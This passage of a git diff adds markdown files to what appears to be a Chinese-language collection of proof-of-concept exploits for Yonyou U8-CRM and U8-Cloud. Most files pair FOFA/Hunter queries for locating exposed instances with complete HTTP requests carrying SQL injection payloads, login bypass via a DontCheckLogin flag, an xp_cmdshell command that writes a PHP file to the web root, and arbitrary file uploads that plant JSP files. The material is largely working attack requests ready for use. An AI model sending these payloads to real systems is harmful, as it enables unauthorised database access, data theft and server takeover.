+cWhCode=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2899%29%2BCHAR%28105%29%2BCHAR%28114%29%2BCHAR%2887%29%2BCHAR%28120%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%28106%29%2BCHAR%2885%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2875%29%2BCHAR%2868%29%2BCHAR%28108%29%2BCHAR%2899%29%2BCHAR%28114%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2873%29%2BCHAR%2876%29%2BCHAR%2877%29%2BCHAR%28101%29%2BCHAR%2870%29%2BCHAR%28122%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28103%29%2BCHAR%2881%29%2BCHAR%2899%29%2BCHAR%28107%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%2867%29%2BCHAR%2885%29%2BCHAR%2876%29%2BCHAR%2879%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29--+KRVC
+```
+
+```javascript
+POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getInvOtherInfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+cInvCode=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--
+```
+
+```javascript
+POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getCusInfo HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+cus=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27--
+```
+
+```javascript
+POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getCusPrice HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+i=-99%27%3BWAITFOR+DELAY+%270%3A0%3A3%27--
+```
+
+![image-20241128092450453](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280924536.png)
+
+![image-20241128092503553](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280925626.png)
\ No newline at end of file
diff --git a/用友U8-CRM系统chkService.php存在SQL注入漏洞.md b/用友U8-CRM系统chkService.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..a1bab1d
--- /dev/null
+++ b/用友U8-CRM系统chkService.php存在SQL注入漏洞.md
@@ -0,0 +1,29 @@
+## 用友U8-CRM系统chkService.php存在SQL注入漏洞
+
+用友U8-CRM系统 /ajax/chkService.php 文件存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+GET /ajax/chkService.php?Action=chkAccountNumExists&accountNum=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=bgsesstimeout-;
+Connection: close
+```
+
diff --git a/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md b/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..5209835
--- /dev/null
+++ b/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md
@@ -0,0 +1,43 @@
+# 用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞
+
+用友U8-CRM系统 `/config/fillbacksetting.php` 存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Connection: close
+```
+
+```javascript
+GET /config/fillbacksettingedit.php?DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Connection: close
+```
+
+![image-20240927200752980](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272007101.png)
+
+![image-20240927200857642](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272008790.png)
diff --git a/用友U8-CRM系统getDeptName存在SQL注入漏洞.md b/用友U8-CRM系统getDeptName存在SQL注入漏洞.md
new file mode 100644
index 0000000..5d4668b
--- /dev/null
+++ b/用友U8-CRM系统getDeptName存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+## 用友U8-CRM系统getDeptName存在SQL注入漏洞
+
+用友U8+CRM系统getDeptName存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+POST /lead/leadconversion.php?DontCheckLogin=1&Action=getDeptName HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+userid=1%27;WAITFOR+DELAY+%270:0:5%27--
+```
+
+![image-20241206220645156](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062206241.png)
\ No newline at end of file
diff --git a/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md b/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..6ab9546
--- /dev/null
+++ b/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞
+
+用友U8-CRM  ajax/getufvouchdata.php 文件多个方法存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## hunter
+
+```jade
+app.name="用友 CRM"
+```
+
+## fofa
+
+```jade
+title="用友U8CRM"
+```
+
+## poc
+
+```javascript
+POST /ajax/getufvouchdata.php?DontCheckLogin=1&Action=getRelations HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: PHPSESSID=bgsesstimeout-;
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Connection: close
+
+pID=1%27%20UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%2867%29%2BCHAR%2871%29%2BCHAR%28117%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2879%29%2BCHAR%28112%29%2BCHAR%28109%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%2880%29%2BCHAR%2880%29%2BCHAR%28104%29%2BCHAR%2872%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2866%29%2BCHAR%2865%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%28101%29%2BCHAR%28104%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%2879%29%2BCHAR%28121%29%2BCHAR%28100%29%2BCHAR%2868%29%2BCHAR%2868%29%2BCHAR%28117%29%2BCHAR%2876%29%2BCHAR%28122%29%2BCHAR%28110%29%2BCHAR%2872%29%2BCHAR%28109%29%2BCHAR%2876%29%2BCHAR%2871%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29--%20uSHu&cID=1
+```
+
+![image-20241128092143696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280921776.png)
\ No newline at end of file
diff --git a/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md b/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md
new file mode 100644
index 0000000..f3b950f
--- /dev/null
+++ b/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友U8-CRM系统接口attrlist存在SQL注入漏洞
+
+
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+POST /devtools/tools/attrlist.php?DontCheckLogin=1&isquery=1 HTTP/1.1
+Host: 
+Connection: close
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; 
+
+obj_type=1';WAITFOR DELAY '0:0:5'--
+```
+
diff --git a/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md b/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..5bac6c3
--- /dev/null
+++ b/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md
@@ -0,0 +1,17 @@
+# 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞
+
+用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞
+
+## hunter
+
+```yaml
+app.name="用友 CRM"
+```
+
+## poc
+
+```java
+GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1
+Host:
+```
+
diff --git a/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md b/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md
new file mode 100644
index 0000000..8dd2991
--- /dev/null
+++ b/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md
@@ -0,0 +1,12 @@
+## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞
+
+
+## poc
+```
+POST /u8cuapws/rest/archive/verify HTTP/1.1
+Host: your-ip
+User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+ 
+{"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}}
+```
diff --git a/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md b/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md
new file mode 100644
index 0000000..b8dc46e
--- /dev/null
+++ b/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+## 用友U8 Cloud-KeyWordReportQuery存在SQL注入漏洞
+
+
+## poc
+```
+POST /service/~iufo/nc.itf.iufo.mobilereport.data.KeyWordReportQuery HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+{"reportType":"1';waitfor delay '0:0:3'-- ","pageInfo":{"currentPageIndex":1,"pageSize":1},"keyword":[]}
+```
diff --git a/用友U8-Cloud-upload任意文件上传漏洞.md b/用友U8-Cloud-upload任意文件上传漏洞.md
new file mode 100644
index 0000000..7312509
--- /dev/null
+++ b/用友U8-Cloud-upload任意文件上传漏洞.md
@@ -0,0 +1,28 @@
+
+## 用友U8-Cloud upload任意文件上传漏洞
+该系统upload.jsp存在任意文件上传漏洞，攻击者可通过该漏洞上传木马，远程控制服务器
+
+## fofa
+```app="用友-U8-Cloud"```
+
+## exp
+```
+POST /linux/pages/upload.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0
+Connection: close
+Content-Length: 31
+Content-Type: application/x-www-form-urlencoded
+filename: hack.jsp
+Accept-Encoding: gzip
+
+<% out.println("The website has vulnerabilities!!");%>
+```
+## 漏洞复现
+![](https://img-blog.csdnimg.cn/img_convert/4e222417f164a3b33772bf18041feb82.png)
+
+![](https://img-blog.csdnimg.cn/img_convert/d68273de84c541f1cb5a0ac52b469b98.png)
+
+## 路径
+http://ip:port/linux/hack.jsp
+
diff --git a/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..5cd8953
--- /dev/null
+++ b/用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞
+
+用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```java
+app="用友-U8-Cloud"
+title=="U8C"
+```
+
+## poc
+
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081935783.png)
diff --git a/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..65f168a
--- /dev/null
+++ b/用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞
+
+用友U8-Cloud系统接口MultiRepChooseAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```java
+app="用友-U8-Cloud"
+title=="U8C"
+```
+
+## poc
+
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.web.reference.MultiRepChooseAction&method=execute&taskId=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20240908193426080](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081934138.png)
\ No newline at end of file
diff --git a/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md b/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md
new file mode 100644
index 0000000..a86a83b
--- /dev/null
+++ b/用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023).md
@@ -0,0 +1,20 @@
+# 用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞复现(CNVD-2024-33023)
+
+用友U8-Cloud系统接口ReleaseRepMngAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+```javascript
+title=="U8C"
+```
+
+## poc
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![image-20241219152517973](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191525077.png)
\ No newline at end of file
diff --git a/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md
new file mode 100644
index 0000000..5cd8953
--- /dev/null
+++ b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞 - 副本.md	
@@ -0,0 +1,23 @@
+# 用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞
+
+用友U8-Cloud系统接口AddTaskDataRightAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```java
+app="用友-U8-Cloud"
+title=="U8C"
+```
+
+## poc
+
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.task.AddTaskDataRightAction&method=execute&strTaskID=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409081935783.png)
diff --git a/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..66f6e7a
--- /dev/null
+++ b/用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞.md
@@ -0,0 +1,29 @@
+# 用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞
+
+用友U8-Cloud系统接口RepAddToTaskAction存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```java
+app="用友-U8-Cloud"
+title=="U8C"
+```
+
+## poc
+
+```javascript
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.RepAddToTaskAction&method=save&taskSelected=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409010005308.png)
+
+
+
+## 漏洞来源
+
+- [用友U8 Cloud RepAddToTaskAction SQL注入漏洞复现-CSDN博客](https://axsec.blog.csdn.net/article/details/141719740?spm=1001.2014.3001.5502)
\ No newline at end of file
diff --git a/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md b/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md
new file mode 100644
index 0000000..cfae3f4
--- /dev/null
+++ b/用友U8-Cloud系统接口approveservlet存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 用友U8-Cloud系统接口approveservlet存在SQL注入漏洞
+
+用友U8-Cloud系统接口approveservlet存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+title=="U8C"
+```
+
+## hunter
+
+```javascript
+app.name="用友 U8 Cloud"
+```
+
+## poc
+
+```javascript
+POST /service/approveservlet HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Connection: close
+
+BILLID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20WPWZ&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud
+```
+
+![image-20241101195523618](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011955693.png)
diff --git a/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md b/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md
new file mode 100644
index 0000000..b8f9863
--- /dev/null
+++ b/用友U8-Cloud系统接口esnserver存在任意文件上传漏洞.md
@@ -0,0 +1,38 @@
+# 用友U8-Cloud系统接口esnserver存在任意文件上传漏洞
+用友U8 cloud前台任意文件上传导致远程命令执行漏洞。未经授权攻击者通过漏洞上传任意文件，最终可以获取服务器权限。
+
+## fofa
+
+```javascript
+title=="U8C"
+```
+
+## hunter
+
+```javascript
+app.name="用友 U8 Cloud"
+```
+
+## poc
+```plain
+POST /service/esnserver HTTP/1.1 
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 
+Accept-Encoding: gzip, deflate 
+Content-Type: application/x-www-form-urlencoded 
+Token: 469ce01522f64366750d1995ca119841 
+Content-Length: 583 
+ 
+{"invocationInfo":{"ucode":"123","dataSource":"U8cloud","lang":"en"},"method":"uploadFile","className":"nc.itf.hr.tools.IFileTrans","param":{"p1":"UEsDBAoAAAAAAA9tSFkDJCbXbQAAAG0AAAAKAAAAY29tcHJlc3NlZDwlIG91dC5wcmludGxuKCIxMjM0NTYiKTsgbmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTsgJT5QSwECHwAKAAAAAAAPbUhZAyQm120AAABtAAAACgAkAAAAAAAAACAAAAAAAAAAY29tcHJlc3NlZAoAIAAAAAAAAQAYACbiFZZEGdsBHOcblEgZ2wERXscDRxnbAVBLBQYAAAAAAQABAFwAAACVAAAAAAA","p2":"webapps/u8c_web/test123.jsp"},"paramType":["p1:[B","p2:java.lang.String"]} 
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1728923468100-14a051e7-c93c-4c37-9a6f-0782a64222a7.png)
+
+上传文件位置
+
+```plain
+/test123.jsp
+```
+
+
+
diff --git a/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md b/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md
new file mode 100644
index 0000000..353c59e
--- /dev/null
+++ b/用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞
+
+用友U8-Cloud系统接口uapbd.refdef.query存在SQL注入漏洞，允许攻击者通过恶意构造的SQL语句操控数据库，从而导致数据泄露、篡改或破坏，严重威胁系统安全。
+
+## fofa
+
+```javascript
+title=="U8C"
+```
+
+## hunter
+
+```javascript
+app.name="用友 U8 Cloud"
+```
+
+## poc
+
+```javascript
+POST /u8cloud/openapi/uapbd.refdef.query?appcode=huo&isEncrypt=N HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: application/json
+Accept-Encoding: gzip
+Connection: close
+
+{"refName":"1%' UNION ALL SELECT 1,CONVERT(INT,@@VERSION),1-- "}
+```
+
+![image-20241101195827533](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411011958611.png)
\ No newline at end of file
diff --git a/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md b/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..4e8a728
--- /dev/null
+++ b/用友U8-cloud-RegisterServlet接口存在SQL注入漏洞.md
@@ -0,0 +1,38 @@
+## 用友U8-cloud RegisterServlet接口存在SQL注入漏洞
+U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。
+
+U8 cloud不同于传统的ERP，融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控，管理，规范、高效、协同、透明。通过云模式，低成本，快速部署，即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接，业务模式、服务模式的经营创新。
+
+该系统RegisterServlet接口存在SQL注入漏洞，并且属于1day状态。
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+发送下面的poc，响应包返回123456 的md5为存在漏洞
+```
+POST /servlet/RegisterServlet HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 85
+Accept: */*
+Accept-Language: en
+Content-Type: application/x-www-form-urlencoded
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip
+
+usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+```
+返回
+```
+HTTP/1.1 200 OK
+Connection: close
+Content-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMT
+Server: Apache-Coyote/1.1
+Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server;
+Path=/; HttpOnly
